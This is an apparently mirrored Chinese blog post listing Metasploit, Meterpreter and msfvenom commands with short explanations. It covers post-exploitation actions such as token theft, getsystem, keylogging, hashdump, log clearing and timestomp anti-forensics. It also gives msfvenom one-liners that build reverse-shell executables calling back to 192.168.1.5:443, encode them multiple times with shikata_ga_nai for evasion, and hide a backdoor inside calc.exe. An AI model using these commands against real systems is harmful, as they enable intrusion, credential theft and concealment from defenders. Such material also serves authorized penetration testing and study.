zoukankan      html  css  js  c++  java
  • metasploit基础命令

    metasploit

    启动终端 msfconsole

    help metasploit命令

    tab 可以补全命令,文件之类的

    search xxx

    show exploitspayloadsauxiliary ame

    info 展示出制定渗透攻击或模块的相关信息

    use name 装载一个渗透攻击或者模块

    LHOST 本地可以让目标主机连接的ip地址,通常目标主机不在同一个局域网内,就需要是公共ip地址

    RHOST 远程主机或目标主机

    set funtion 设置特定的配置参数

    setg function 设置全局特定的配置参数,就是使用不同的模块不需要再设置一些配置了

    show options 列出某个渗透攻击或模块中所有的配置参数

    show targets 列出渗透攻击所支持的目标平台,哪些系统以及什么级别补丁才可能渗透成功

    set payload payload

    show advanced 列出所有高级配置选项 , 有些可以自动化攻击

    set autorunscript migrate -f 在渗透攻击完成后,将自动迁移到另一进程

    check 检测目标是否对选定渗透攻击存在相应安全漏洞

    exploit -j 攻击将在后台进行

    exploit -z 渗透攻击成功后不与会话进行交互

    exploit -e encoder 制定使用的攻击载荷编码方式

    sessions -l 列出可用的交互会话

    sessions -l -v 详细信息

    sessions -s script 在所有活跃的会话中运行一个特定的meterpreter脚本

    sessions -K 杀死所有会话

    sessions -c cmd 执行一个命令

    db_creat name 创建一个数据库

    db_connect name 创建并连接数据库

    workspace 列出当前连接的数据库中所有的工作空间

    workspace name 使用指定的工作空间

    workspace -a name 创建一个工作空间

    workspace -d name 删除指定的工作空间

    workspcae -D 删除所有的工作空间

    db-namp 利用namp 并把扫描数据存储到数据库中

    Meterpreter

    run scriptname

    sysinfo 列出受控主机的系统信息

    ps 显示所有运行进程以及关联的用户账号

    migrate PID 迁移到一个指定的进程ID

    use incognito 用来盗窃目标主机的令牌或是假冒客户

    list_tokens -u 列出目标主机用户的可用令牌

    list_tokens -g 列出目标主机用户组的可用令牌

    steal_token PID 盗窃给定进程的可用令牌并进行令牌假冒

    drop_token 停止假冒当前令牌

    getsystem 通过各种攻击向量来提升到系统用户权限

    shell 以所有可用令牌来运行一个交互的shell

    execute -f cmd.exe -i 执行cmd.exe 命令 并进行交互

    execute -f cmd.exe -i -t 以所有可用令牌来执行cmd命令

    execute -f cmd.exe -i -H -t 以所有可用令牌来执行cmd命令并隐藏该进程

    rev2self 回到控制目标主机的初始账户下

    reg command 在目标主机注册表中进行交互。创建,删除,查询等操作

    screenshot 对目标主机的屏幕进行截图

    upload file 向目标主机上传文件

    download file 从目标主机下载文件

    keyscan_start 针对远程目标主机开启键盘记录功能

    keyscan_dump 存储目标上捕获的键盘记录

    keyscan_stop 停止针对目标主机上的键盘操作

    getprivs 尽可能多的获取目标主机上的特权

    uictl enable keyboard/mouse 接管目标主机的键盘和鼠标

    background 将你当前的meterpreter shell 转为后台执行

    hashdump 导出目标主机中的哈希口令值

    use sniffer 加载嗅探模块

    sniffer_interfaces 列出目标主机所有开放的网络接口

    sniffer_dump/start/stats/stop interfaceID

    clearev 清除目标主机上的日志记录

    reboot 重启目标主机

    timestomp 修改文件属性,例如修改文件的创建时间(反取证调查)

    msfvenom

    msfvenom -l payloads 列出所有可用的攻击载荷,encoders、nops、all 列出所有可用的编码器/空指令生成器/全部模块

    msfvenom -p windows/meterpreter/bind_tcp --payload-options 列出配置项

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 -f exe -o payload.exe

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 -e x86/shikata_ga_nai -i 5 -f exe -o en_payload.exe

    //将该payload进行了5次shikata_ga_nai编码

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 -e x86/_countdown -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -i 5 -f exe -o multi_payload.exe

    //创建一个经过多种编码格式嵌套编码的攻击载荷

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 -x clac.exe -k -o playload.exe -e x86/shikata_ga_nai -i 7 -f exe

    // 使用calc.exe 作为载荷后门程序,让载荷执行流一直运行在被攻击的应用程序中

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 -x clac.exe -o playload.exe -e x86/shikata_ga_nai -i 7 -f exe

    // 不让载荷执行流一直运行在被攻击的应用程序中,同时在攻击载荷执行后,也不会在目标主机上弹出任何信息

    meterpreter 后渗透阶段命令

    meterpreter > use priv
    meterpreter > getsystem
    meterpreter > ps
    
    meterpreter > steal_token 1784
    meterpreter > shell
    
    
    
  • 相关阅读:
    面向对象
    用JS添加和删除class类名
    偶然
    js-cookie的用法
    eleemnt-ui修改主题颜色
    router.go,router.push,router.replace的区别
    vue生产环境清除console.log
    特别关心
    echart
    20182330魏冰妍_预备作业
  • 原文地址:https://www.cnblogs.com/GH-D/p/8685591.html
Copyright © 2011-2022 走看看